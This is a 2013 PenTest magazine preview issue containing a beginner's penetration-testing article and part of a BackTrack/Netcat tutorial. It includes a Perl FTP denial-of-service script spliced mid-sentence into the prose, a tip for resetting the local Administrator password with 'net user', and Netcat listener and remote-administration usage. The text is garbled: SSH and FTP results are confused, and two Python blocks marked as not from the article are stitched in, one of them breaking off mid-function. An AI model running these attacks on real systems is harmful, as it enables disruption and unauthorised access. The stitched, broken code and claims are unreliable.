PenTest Mag 2013 07




Cyber Security Auditing Software

Improve your Firewall Auditing
As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, who are often protective of their own methods and technologies. On any particular assessment, testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking, and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.
The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to focus quickly on potentially vulnerable systems and services, using a variety of tools designed to probe and examine them in more detail (e.g. web service query tools). However, this is only part of the picture: a more thorough analysis of most systems involves having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could achieve.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device-, version- and configuration-specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising on detail.

You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device against that policy and then create the report detailing the issues identified. The reports can include device-specific mitigation actions and can be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade.
He has been accredited by CESG for his security and team-leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and that provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania's products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

Dear PenTest Readers,


Editor in Chief: Ewa Duranc [email protected]
Managing Editor: Jakub Walczak [email protected]
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, William F. Slater, III
Betatesters & Proofreaders: Jackson Bennet, Amit Chugh, Gregory Chrysanthou, Rodrigo Comegno, Dan Dieterle, Pinto Elia, Zbiegniew Fiołna, José Luis Herrera, Antonio James, Duncan Keir, David Kosorok, Gilles Lami, L. Motz, Horace Parks, Jr, Sagar Rahalkar, Michał Rogaczewski, Antonio Domenico Saporita, Robin Schroeder, Jeff Smith, Johan Snyman, Arnoud Tijssen, Tom Updegrove, Jakub Walczak and others
Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic [email protected]
Production Director: Andrzej Kuca [email protected]
Art Director: Ireneusz Pogroszewski [email protected]
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media, 02-682 Warszawa, ul. Bokserska 1, Phone: 1 917 338 3631
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

You are probably wondering what you will find in the upcoming issues of the magazine. The free (as you probably already know, since you are reading this) PenTest OPEN, as always, is here to answer this question and show you what you can expect from our future publications. This month, we will go back a bit to the past and give you a glimpse of what you can find in our July release, the enormous (150 pages) BackTrack Compendium. We decided to give you an opportunity to take a look at three articles from this issue of PenTest Extra. Davide Peruzzi, OSCP, will bring your attention to the importance of preparation for pentesting. Also, Lance Claghorn will discuss the five common stages of an attack and how to use them for testing. Finally, Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme will provide you with a broad guide to using BackTrack for penetration testing. Time for something fresh for the freshmen. Our recently published Starter Kit gives you several tips on how to become a pentesting rock star. In PenTest OPEN we give you two tastes of what you will find in the issue. Chris Berberich guides our young cadets through a properly conducted penetration test and shows how to avoid typical mistakes. On the other hand, Jane Andrew advises how to save the world's businesses by pentesting smartphones. In addition, continuing the smartphone topic, Michael Trofi and Duane Schleen put the limelight on the risks coming from mobile applications' vulnerabilities. To finish our journey through the issue, Fadli B. Sidek will instruct you how to evade anti-virus and anti-spam detection. We hope you will enjoy PenTest OPEN and gain much new knowledge. Have a nice read!

Jakub Walczak and PenTest Team


The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

OPEN 06/2013






Pivotal Basics for Every Beginner
By Chris Berberich
Pentesting is always very hard at the beginning. People often make really trivial mistakes. The steps and suggestions in this article will help you avoid most of them and conduct a proper pentest. FROM: Starter Kit 03/2013 ‒ Become a Well-known Pentester Today

12 Sharpen your Axe with BackTrack
By Davide Peruzzi
Abraham Lincoln said 'Give me six hours to chop down a tree and I will spend the first four sharpening the axe.' This is really the basic concept and the starting point of every penetration test. FROM: PenTest Extra 03/2013 ‒ BackTrack Compendium

18 Pentesting with BackTrack
By Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme
Penetration testing, also known as pentesting, is a technique to evaluate the security of computers and networks by performing attacks that imitate external and internal threats. The pentesting process involves static and dynamic analysis of a system or network in order to reveal potential security issues resulting from improper configurations or hardware/software flaws. These attacks should be executed from the point of view of potential attackers. FROM: PenTest Extra 03/2013 ‒ BackTrack Compendium

40 Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and Armitage
By Lance Cleghorn
The EC-Council identifies five stages of attack that are common to cyber penetration. These stages of attack may be used to categorize incidents where a network or a host has been compromised. Since these stages are common to real attacks, they are used by ethical hackers to conduct penetration testing. An ethical hacker or white-hat hacker may use these steps in order, or may selectively choose the steps that work best for the particular vulnerability. FROM: PenTest Extra 03/2013 ‒ BackTrack Compendium

46 Mobile Applications: The True Potential Risks ‒ Where to Look for Information When Performing a Pentest on a Mobile Application
By Michael Trofi and Duane Schleen
This article mainly covers what security professionals should be looking for when performing a penetration test of a mobile application. Although similar data concerns exist on Android and Windows Phone 7 devices, the main discussion here concentrates on data found for iOS applications. FROM: PenTest WebApp 01/2013 ‒ Build Your Own Pentesting Workshop (TO BE RELEASED)

54 Employers: Smartphone Pentesting could Save your Business
By Jane Andrew
Are you the owner of a company? If so, you cannot miss this article. It will help you improve your firm's security and avoid unnecessary expenses. FROM: Starter Kit 03/2013 ‒ Become a Well-known Pentester Today

60 AV Evasion: Bypassing AV Products and Protection Against It
By Fadli B. Sidek
AV evasion techniques are getting better and smarter by the day, and having just an anti-virus and anti-spyware application is insufficient to protect our machines from additional angles of threat. FROM: PenTest Regular 05/2013 (TO BE RELEASED)





Pivotal Basics for Every Beginner
Is being a pentester your dream job? Would you like to do pentesting every day for the rest of your life, but you do not know where to start? In this article I will describe all you need to begin the journey.

This article comes from PenTest Starter Kit. Download the complete issue.

I believe that penetration testing, and any other internet security field, is more a frame of mind than anything else, i.e. thinking outside the box. When a person asks what I do for a living and I tell them I am a pentester, their response is always the same: "What is that, and how can I get that title?" I have the same answer every time: a penetration test is a chess match. It is played between the pentester and the contracting organization's IT department. You start out as a pawn and end up as a queen, and that queen must be able to achieve checkmate in the organization's network infrastructure. There are three different groups of educated pentesters. There are the self-educated, which includes people like gamers and those who are simply curious about how to hack a network. Then you have the college-educated, who decided to go to school and learn how a network operates and how to secure it. Lastly, you have the third category, which combines the first two. None is better than the others, because to become a well-known pentester you must be educated in networking, have certifications to prove you can go the extra mile, and be up to date with the latest technologies.


Types of Pentesters

A pentester is considered an ethical hacker because there has to be a level of trust between the hiring organization and the tester. When I tell people I am a pentester, I usually follow by explaining that I am an ethical hacker. It is confusing because these two roles can seem to conflict with one another. Before becoming a pentester, you have to decide which group of hackers you want to fall under: white hat, grey hat, black hat, or script kiddie. The term "hacker" has not always had the negative connotations that it has today. A hacker originally described a person with a desire to learn about and experiment with technology, and referred to someone who was technically proficient with whatever systems they hacked. The group under which you portray yourself will determine whether you should pursue a career as a pentester. White hats may be security professionals, hired by companies to audit network security or test software. Having access to the same software tools that other hackers use, a white hat seeks to improve the security of a network by attacking the network or application as a black hat hacker would. A black hat hacker is a person who attempts to find network and application security vulnerabilities and exploit them for personal financial gain or other malicious reasons. This differs from white hat hackers, who are security specialists employed to use hacking methods to find the security flaws that black hat hackers might exploit.

Black hat hackers can inflict major damage on both individual computer users and large organizations by stealing financial information, compromising the security of systems, or by taking down a network or changing the function of websites and networks. A grey hat is willing to go to the extremes of both black and white hat hackers. Black hats typically indulge to prove a point that is usually supported by white hats. A grey hat's "principles" are the very thing that sets them apart from the other classes of hackers. In most situations they may not disclose their activities because of the legal consequences. It is not out of the question for a grey hat hacker to hack for personal gain, although it is also not unheard of for them to compromise whole systems for the perceived "greater good" either. Script kiddie is a derogatory term for non-serious hackers who are believed to reject the ethical principles held by professional hackers: the pursuit of knowledge, respect for skills, and a motive of self-education. Script kiddies shortcut most hacking methods in order to acquire their hacking "skills" quickly. They will use resources such as YouTube, watch a video of an actual attack performed by a genuine hacker, and then try to replicate the attack. They attempt to attack and crack computer networks and vandalize websites. Although they are considered inexperienced and undeveloped, script kiddies can cause as much damage as skilled hackers. The majority of pentesters fall into the white hat, grey hat, and script kiddie groups. You really cannot be a black hat and a pentester, because that would mean you deliberately destroy a network when you perform a pentest; in this industry you will not last long with that mentality. Yes, I put some pentesters in the script kiddie group.
Over the years, I have looked over other companies' pentest reports, and it baffles me how some organizations pass off their reports as serious pentest reports when they are more like a vulnerability assessment. I have seen instances where a company ran a vulnerability scanner and turned in those results as a pentest report. In other cases, I have seen reports delivered by an organization that only ran Metasploit (a framework that runs the exploits for you). The problem with these situations is, first, that these are not penetration tests but vulnerability assessments. Second, we lose our skills as IT security professionals if we rely solely on GUI tools. The only thing you learn from that experience is how to use a GUI and how to hit the start button. To me, this is a huge problem. I believe that in order to be a well-known pentester you need to know what is going on behind the scenes of the vulnerability scanner and the exploits. Ask yourself: what is it actually scanning? When I begin a pentest, there is a lot I need to prepare before I even start scanning.

Penetration Testing vs Vulnerability Assessment
Vulnerability Assessment:
- Typically general in scope; includes an assessment of the network or a web application.
- A scan that identifies known network, operating system, web application, and web server vulnerabilities using GUI tools, with very minimal exploiting, if any.
- Unreliable at times, with a high rate of false positives.

Penetration Testing:
- Focused in scope; may include targeted attempts to exploit specific vectors.
- Extremely accurate and reliable.
- Penetration Testing = vulnerabilities that have been exploited and confirmed.

It is impossible to say that a vulnerability assessment is a better choice than a penetration test. Both vulnerability assessments and penetration tests are a necessity for an organization's network security. I suggest, at a minimum, that you run a vulnerability assessment at least every three months and a full-blown penetration test once a year. By doing this, you keep your network hardened against hackers.

Testing Phases

Though the methodology used by a pentester may change depending on individual preferences, the client contract, or employer principles, for the most part all methodologies include the same stages.

Planning and Scoping

The planning and scoping stage occurs when your organization and the client decide what is within the scope of the test and what must be excluded from it. As a pentester, you must be aware of any potential risks associated with the pentest. Before you start the penetration test, always get a "get out of jail free card": a document signed by the organization and by yourself. This document should include the scope of the test, with the URLs and the external and internal IP addresses to be tested. It also needs some wording covering what happens if the network goes down, or if your scanners cause bandwidth problems severe enough to interrupt the organization's everyday business continuity. Finally, it should state that the organization has everything backed up and cannot take legal action against you for any reason. Here is an example of a scope agreed between yourself and the client:

The scope encompassed the internal and external network infrastructure, which included routers, servers, and firewalls hosted in the organization's Cincinnati, Ohio office. The network penetration test was performed from the organization's network in the Cincinnati, Ohio office.

Information gathering

In this phase, the penetration tester accumulates as much information as possible that will assist with the test. This includes public records, email addresses within the organization, and the organization's web presence. In the initial stage, web search engines are used to gather as much information about the target organization as possible, including target machines on the network. The next step is to find live hosts on the network, which can be achieved with discovery tools such as Nmap. After gathering a list of machines on the network and their open ports, we have to verify that the ports are actually open. The reason is that scans sometimes give false results, especially for UDP ports, where the absence of a reply can mean the port is filtered just as easily as open. So, for example, we identified a machine with a lot of ports open. Let's do a little reconnaissance on that target.

Reconnaissance

In this stage, the penetration tester assesses all of the options available within the scope of the penetration test. The pentester decides what tools are to be used and the method of the pentest itself. This will include methods such as network scanning, enumeration, and code injection. The goal of reconnaissance is to identify the vulnerabilities that the tester will then attempt to exploit in the next phase. There are many vulnerability scanners out there, so which one should I use? Personally, I use several, to keep the number of false positives in the vulnerability report as low as possible. As a penetration tester, you have to be resourceful and use what is available. For this test let's use a vulnerability scanner within Kali. You are probably also wondering why you would use a vulnerability scanner when such a tool creates a lot of noise on the network. It is very simple: the job of a penetration tester is to be as thorough as possible, uncovering as many holes as they can find. It is always the penetration tester's job to verify each vulnerability found before marking it as a positive result, and to remove all the false positives. There are hundreds of pages of information in the scan report, and I would suggest looking at all of the results. For this case, the one I am interested in is the vulnerability marked as high, so I am going to click on it and see what it says. The scan found that the FTP service accepts the password 'anonymous' for the anonymous account. Here is the finding, as reported by the vulnerability scanner, which could be exploited:

Anonymous FTP
Synopsis: Disable anonymous FTP access if it is not needed. Anonymous FTP access can lead to an attacker gaining information about your system that can possibly lead to them gaining access to your system.
Exploitable Risk Factor: Medium (CVSS 7.1)
Host:

Exploitation

Exploiting is the art of taking advantage of the known vulnerabilities discovered in the scanning phase. The idea is to gain access to the systems as a hacker would and exploit them. This may include SQL injection, input validation flaws, cross-site scripting, and broken authentication and session management. We will be using the username list that we grabbed during the vulnerability assessment phase (I created a file named anonymous.doc containing the name "anonymous") and a copy of the wordlist that ships with Kali. We will also run the SSH module written in Perl, since we already know that the anonymous account is enabled for FTP. Let's look up the CVE numbers and search Google. CVE-1999-0527 is the CVE number that I found using Google. So, to make sure this isn't a false positive, let's go back to the SSH module and re-scan for an anonymous password on the FTP account:

[22][ssh] host: login: anonymous password: anonymous

Note that the bracketed prefix on that result line shows it came from port 22 (SSH): the credential pair anonymous/anonymous was confirmed against SSH here, whereas the scanner finding above concerns the FTP service on port 21. Each service needs to be confirmed separately before it goes into the report.
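Two of the steps above come down to the same discipline: a port is only "open" once you have completed a connection to it, and a scanner finding such as "anonymous FTP" is only a finding once you have reproduced it yourself. The following Python script is an added example (it is not code from the article, and the article's own listing is the Perl script discussed later). It takes findings in the shape a scan report gives you, confirms each TCP port with a real connection, and for FTP attempts the anonymous login by speaking the protocol and reading the reply codes. Everything in it is constructed for the demonstration: the FTP stand-in server, its banner text, the findings list, and the password `anonymous@example.com` are assumptions, not values from the article.

```python
"""Verify scanner findings by talking to the service instead of trusting the scan.
Added example, not the article's code: confirms a reported TCP port really accepts
connections and, for FTP, whether anonymous login works, by parsing reply codes
(RFC 959: 220 banner, 331 password needed, 230 logged in, 530 rejected).
A constructed FTP stand-in is included so everything runs offline."""
import socket
import threading

def _read_reply(sock):
    """Read one FTP reply; multi-line replies end with a '<code><space>' line."""
    data = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
        lines = data.split(b"\r\n")
        if len(lines) >= 2 and len(lines[-2]) >= 4 and lines[-2][3:4] == b" ":
            break
    return data.decode(errors="replace")

def port_open(host, port, timeout=3.0):
    """A completed TCP handshake is the only proof that a scanner's 'open' is real."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def ftp_anonymous_login(host, port=21, password="anonymous@example.com", timeout=5.0):
    """Try USER anonymous / PASS <password> (assumed value); return (accepted, last_reply)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _read_reply(s)
        if not banner.startswith("220"):
            return False, banner
        s.sendall(b"USER anonymous\r\n")
        reply = _read_reply(s)
        if reply.startswith("230"):  # some servers need no password at all
            s.sendall(b"QUIT\r\n")
            return True, reply
        if not reply.startswith("331"):
            return False, reply
        s.sendall(b"PASS " + password.encode() + b"\r\n")
        reply = _read_reply(s)
        s.sendall(b"QUIT\r\n")
        return reply.startswith("230"), reply

def verify_findings(findings):
    """findings: (host, port, service) tuples from a scan report -> {(host, port): verdict}."""
    verdicts = {}
    for host, port, service in findings:
        if not port_open(host, port):
            verdicts[(host, port)] = "false positive: no TCP connection"
        elif service != "ftp":
            verdicts[(host, port)] = "open (not verified further)"
        else:
            try:
                ok, reply = ftp_anonymous_login(host, port)
            except OSError as exc:
                verdicts[(host, port)] = f"open, FTP check failed: {exc}"
                continue
            state = "CONFIRMED anonymous FTP" if ok else "open, anonymous login rejected"
            verdicts[(host, port)] = f"{state}: {reply.strip()}"
    return verdicts

# --- constructed stand-in target so the example runs offline ---------------------
def _fake_ftp_reply(line, accept_anonymous):
    """Responder logic for the stand-in: (reply bytes, session finished?)."""
    cmd = line.split(b" ", 1)[0].upper()
    if cmd == b"USER":
        return b"331 Please specify the password.\r\n", False
    if cmd == b"PASS":
        ok = b"230 Login successful.\r\n"
        return (ok if accept_anonymous else b"530 Login incorrect.\r\n"), False
    if cmd == b"QUIT":
        return b"221 Goodbye.\r\n", True
    return b"500 Unknown command.\r\n", False

def start_fake_ftp(accept_anonymous):
    """Minimal FTP responder on 127.0.0.1 (constructed, not a real server); returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            try:
                conn.sendall(b"220 example FTP server ready\r\n")
                buf, done = b"", False
                while not done:
                    chunk = conn.recv(1024)
                    if not chunk:
                        break
                    buf += chunk
                    while b"\r\n" in buf and not done:
                        line, buf = buf.split(b"\r\n", 1)
                        reply, done = _fake_ftp_reply(line, accept_anonymous)
                        conn.sendall(reply)
            except OSError:
                pass
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def unused_tcp_port():
    """A port nothing listens on (bound, then released) to demonstrate a false positive."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]
```

Against a real target you would call `verify_findings` with the host and port taken from the scan report; the stand-in functions exist only so the three verdicts (confirmed, rejected, false positive) can be seen without a lab. Reading the reply code rather than grepping for the word "successful" is deliberate: the numeric code is what RFC 959 standardizes, while the text after it varies between servers.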

Privilege escalation

Exploiting a system can result in access to the system with rudimentary privileges. Privilege escalation is the process to gain further access and additional permissions. Learning manual exploits is a key step to becoming a well-known penetration tester and not using a GUI interface tool to do the exploit for you. Automated tools can cause a drop in a network’s bandwidth or drop the network itself. Causing this to happen will give you a bad reputation. While pressing start on a GUI tool, it goes through a lot of unneeded functions like ddos and dos attacks, which are not usually welcomed by your client. It takes a lot of time and practice to
Listing 1. SSH module in Perl
#!/usr/bin/perl $user = "USER anonymous\r\n"; $passw = "PASS [email protected],,,,\r\n"; $command = "CWD "; $dos_input = "."x250; $send = "\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", $socket->recv($serverdata, 1024); print $serverdata; $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); $socket->send($command.$dos_input.$send); $user = "USER anonymous\r\n"; $passw = "PASS [email protected],,,,\r\n"; $command = "NLST "; $dos_input = "/.../.../.../.../.../"; $send = "\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp",

gain privileges to systems doing manual exploits but it is well worth it. Although exploiting a system results in access, on many instances, that access is limited to an account with only rudimentary permissions. Privilege escalation is the process of using further techniques or exploits to gain further permissions. The more permission gained, the more likely a tester is of achieving access to further systems and confidential data. For this we will run an SSH module written in Perl (Listing 1). As you can see, we successfully exploited the FTP account. So you have your results from the vulnerability scanner(s) and completed a few exploits. Now you have to present to the organization the vulnerabilities and exploits. This is done by writing a complete report. Remember to take screen shots of the exploits so that you have proof of the exploit being completed. This will show the organization that you truly know what you are doPeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", $socket->recv($serverdata, 1024); print $serverdata; $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); $socket->send($command.$dos_input.$send); $user = "USER anonymous\r\n"; $passw = "PASS [email protected],,,,,\r\n"; $command = "SIZE "; $dos_input = "/.../.../.../.../.../"; $send = "\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", $socket->recv($serverdata, 1024); print $serverdata; $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); $socket->send($command.$dos_input.$send); $socket->exploit successful/r/n”anonymous”

OPEN 06/2013



ing as a pentester, and you will be on your way to becoming a well-known penetration tester. ed with network basics, particularly the OSI model, TCP/IP, handshakes, the different types of packets, and what's contained in the headers. I also suggest getting an understanding of network scanners and web application scanners. There are plenty of organizations out there that have white papers and tutorials regarding networks and web applications (OWASP, SANS, and NIST). Find practice labs so that you can get practice hacking networks. With all this documentation and assistance it is quite simple to become a pentester, but to be a well-known pentester you must not be limited to one technology. You virtually need to know everything when it comes to servers, networks, and vulnerabilities that can be exploited. You need to ensure that you have a thorough understanding of security. Associate yourself with experienced pentesters and join forums and communities that are willing to extend a helping hand. I was once told that the hacking community, in general, is willing to help “newbies” into the hacking community. In general that is a true statement. To be a successful and well-known hacker you will need to understand and be able to write your own scripts and understand program languages. While you are on your way to learn about programming, the main question to ask is which language to learn? This debate has gone for years and there really is no correct answer to it. Each organization for the most part uses one or two languages for their programming so that they can master the language and hire skilled programmers to keep the organization running. As a pentester you should know multiple languages to some degree and understand that language. Python is a good language to start off with because it's efficiently designed, well documented in forums, and moderately kind to beginners. 
If you get into serious programming, you will have to learn C, the core language of Unix which a pentester should learn or have knowledge of. Perl is worth learning for everyday reasons; it's very widely used for web pages and system administration, so that even if you never write Perl, you should learn to read it. Also, as a penetration tester you must stay up to date on coding, vulnerabilities, and updates to a network. The organization that hired you will expect you to be current in all subjects related to IT security. There is a saying “patch Tuesday, hack Friday” – this basically means when Microsoft patches come out on Tuesday, those pacthes are being hacked Friday. Remember there is brontobytes of information floating around the web. My


This section provides the contracting organization a summary of the results from the vulnerability scanner and exploits that were accomplished during the pentest. The report is broken down into two major sections in order to communicate the objectives, methods, and results of the testing to an executive level and IT staff. The report should be broken down into: The Executive Summary, which would include: Executive Summary of the penetration test, Scope, Background section explaining the overall posture of the organization, and a recommendation Summary. The Technical Report, which would be organized for the IT staff so that they can review and fix the vulnerabilities. This part of the report should include Information Gathering, Vulnerability Assessment, Exploitation/ Vulnerability Confirmation, and the risk of the vulnerabilities to the organization.


Why get certifications? Some of the best hackers do not have certifications, so why should I get them? You do so because you want to become a well-known penetration tester and not just a hacker. To do this, you need to show that your skills are up to date and that you are willing to put in the time to show your employer that you have the skills to do a penetration test. You’re also impressing on your employer that you’re a valued member of the team and that you’re willing to learn. There are many certifications to choose from. A few that stand out are: Certified penetration Testing Engineer (C)PTE, Certified Penetration Testing Consultant C)PTC, GIAC Penetration Tester (GPEN), Certified Ethical Hacker (CEH) and Offensive Security Certified Professional (OSCP). It seems everyone has their own preference in choosing which one is better that the other.


The process of becoming a well-known penetration tester is not going to happen overnight. Being a pentester is my dream job when it comes to IT security. Taking this journey and becoming a wellknown penetration tester involves the pursuit of knowledge whether it is self-taught or through formal education. It is essential to become acquaintOPEN 06/2013

Page 10

suggestion is to join forums, hacking organizations, and read white papers form reliable sources to stay on top of the new technology out there. In conclusion, not everyone will want to become a penetration tester or even know what one is, but within the professional community, there are some key steps to becoming well-known and respected. You must commit to continuing education, don’t be afraid to ask for help, and practice and develop your skills. Bonus Here is some information which is useful but it did not fit into the article well. Key knowledge A penetration test is not a vulnerability scan and a vulnerability scan is not a penetration test, Learn everything you can about operating systems and servers, not just one flavor, Understand the true concepts of TCP/IP, Subnets, and Coding in as many languages as possible, Remember you will not know everything IT related, Google is your best friend. Tip Here is a tip that an old school hacker sent me at one point in time. It works about 60 percent of the time depending on the operating system and what not. As for all exploits, the same percentage could
a d v e r i

go because you are not going to exploit and get root permissions every time you do a pentest due to time restraints within the scope. If you want to hack a computer’s Administrator. If you are logged in to computer with some other account here are the steps: Go to start button click on run Type CMD and press enter A command window will open Type net users This will show you all the users of that computer. Now type net user administrator * and press enter This will ask you to enter a password Enter the password you want to keep for the administrator Re-enter your password to confirm it. DONE

Chris Berberich is a Penetration Tester/Senior Auditor at A-lign Security and Compliance Services based in Tampa, Florida. Chris has an extremely deep and solid understanding of applications, server, and network security. Chris’ focus as a penetration tester was managing corporate Internet infrastructure, systems, and network security – specifically operating systems, web application server, databases, interfacing, and data privacy. Certifications: (C)PEH, (C)PTE. [email protected]


Sharpen your Axe with BackTrack
Gathering phase
Abraham Lincoln said 'Give me six hours to chop down a tree and I will spend the first four sharpening the axe'. This is really the basic concept and the starting point of every penetration test.

Article comes from Pen Test Extra. Download the complete issue.


In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more attack surface you will have. The gathering phase isn't the most exciting one, but it is surely the one that will let you do things better and smarter. So what do you need? Let's see. First, you need an adequate system with the right toolkit and a little knowledge of how the tools work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it will be quite simple to get support or tutorials on the Web: YouTube has a video for almost every BT tool. The best way to start with BT is virtualization: you can download its virtual machine ready to be started. With virtualization you can also easily set up a cheap and smart lab to perform your tests. If you already have a test network, you can also use the bootable CD. Next, you have to be calm and patient: only this way can you collect information and inspect it properly. You can make your own checklist of tests to do or copy one from the Web but, once you have your list, you have to follow it meticulously. Remember that you are sharpening. Now you need to write down all the data you collected in order to have everything recorded, so that you can analyze it even when you aren't connected to the LAN you have to test. Furthermore, you will use these records to make a detailed report for your customer or to roll back in case you mess something up. I use KeepNote to keep track of all my operations and results and Zenmap (the Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

OPEN 06/2013

My friend Netcat

Now let's start with the father of all tools, the famous 'Swiss-army knife for TCP/IP': Netcat. Essentially NC is a utility that reads and writes data across network connections using TCP or UDP transport. Nothing more, nothing less. So why is it so important? When an inexperienced PC user wants to test whether his machine can browse the Internet, he opens his browser and points it at a common address. This is not the best test he could do: he only finds out whether he is browsing, but what if he is not? Then the approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes step by step, up to the human layer. You are not an inexperienced person, so you start by opening a command shell and pinging your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. Google's public DNS). Is it responding? Alright, you are able to get out of your network. Next you test whether your DNS is working by pinging a DNS name. Only if all works fine do you open your browser and test the connection. You can also have a problem in the browser (e.g. a misconfigured proxy set in the browser) but, after all the tests you have done previously, you can rule out all the lower layers and focus on the current one. That's why NC is so important. It allows you to start from the lowest layer; it is the equivalent of the ping command used in the example, but it has many more applications. Well, open your Terminal window and have a look at the NC help. At the beginning you will use the options -l (set NC in listening mode), -v (verbose mode is always better) and -p (set the port where NC is listening). Try this: open two Terminal windows on the same machine. In the first window start a service that listens on a specific port using Netcat (it is called the listener):
nc -lvp 4444

If you have a look at the network connections of your BT machine using the command netstat -nat, you will find a listening socket on port 4444 (tcp LISTEN). In the second window use NC as a client and connect to localhost on port 4444:

nc localhost 4444 -v

Hit Enter and you establish a simple connection with NC, but what is this? Essentially, it is a simple chat. If you write something in window 1, it will be redirected to window 2 and vice versa (see Figure 1). So NC is a program that allows you to communicate using the TCP or UDP protocols, and you can use it either as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test whether a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request an HTML page and, last but not least, remotely administer a PC. If you have two PCs, try to use NC between them, or just continue the testing on the same machine (that is the lower layer).

For example, you can try to pass text:

echo 'This text will be transmitted using Netcat' | nc localhost 4444

...and if the listener is as follows, you can also create a file with the text sent:

nc -lvp 4444 > file.txt

You can also try the -c option for remote administration. I suggest you dig around the Internet to learn more about Netcat use.

Network hosts identification

As I said, finding information about the target is the basis of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own host discovery scripts using ping and NC, or use some of the wonderful tools present in BT. In my opinion the best are Unicornscan and Nmap, but I will explain them later.
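The paragraph above suggests scripting your own checks with ping and NC; here is the Netcat exchange from the previous section in plain Python, as an added example that is not the article's code: a one-shot listener that saves what it receives (nc -lvp 4444 > file.txt), a client that pipes text in, a banner grab, and the TCP-handshake test such a script would build on. The banner string and the file path are constructed for the demo.

```python
"""Added example (not from the article): a Netcat-like listener and client in
plain Python, reproducing what the text does with nc on one machine:
    nc -lvp 4444 > file.txt                 listener that saves what it receives
    echo 'text' | nc localhost 4444         client that pipes text in
    nc localhost 4444 -v                    client that connects and reads the banner
Everything runs on 127.0.0.1 on an ephemeral port, so it works offline.
"""
import os
import socket
import tempfile
import threading


def free_port() -> int:
    """Ask the OS for a currently unused TCP port on the loopback interface."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def start_listener(port: int, out_path: str, banner: bytes = b"") -> threading.Thread:
    """One-shot listener like `nc -lvp port > out_path`.

    If a banner is given it is sent as soon as a client connects, the way an
    FTP or SSH service announces itself; everything received is written to
    out_path until the client closes the connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)            # the port shows as LISTEN in netstat -nat from here on

    def serve() -> None:
        conn, _ = srv.accept()
        with conn, open(out_path, "wb") as out:
            if banner:
                conn.sendall(banner)
            while True:
                chunk = conn.recv(4096)
                if not chunk:    # peer closed: EOF, exactly when nc would exit
                    break
                out.write(chunk)
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return t


def send_text(host: str, port: int, text: str) -> None:
    """Equivalent of `echo 'text' | nc host port`."""
    with socket.create_connection((host, port), timeout=5) as c:
        c.sendall(text.encode())
        c.shutdown(socket.SHUT_WR)   # EOF on stdin: tell the listener we are done


def grab_banner(host: str, port: int, timeout: float = 2.0) -> str:
    """Equivalent of `nc -v host port`: connect and read what the service says first."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        c.settimeout(timeout)
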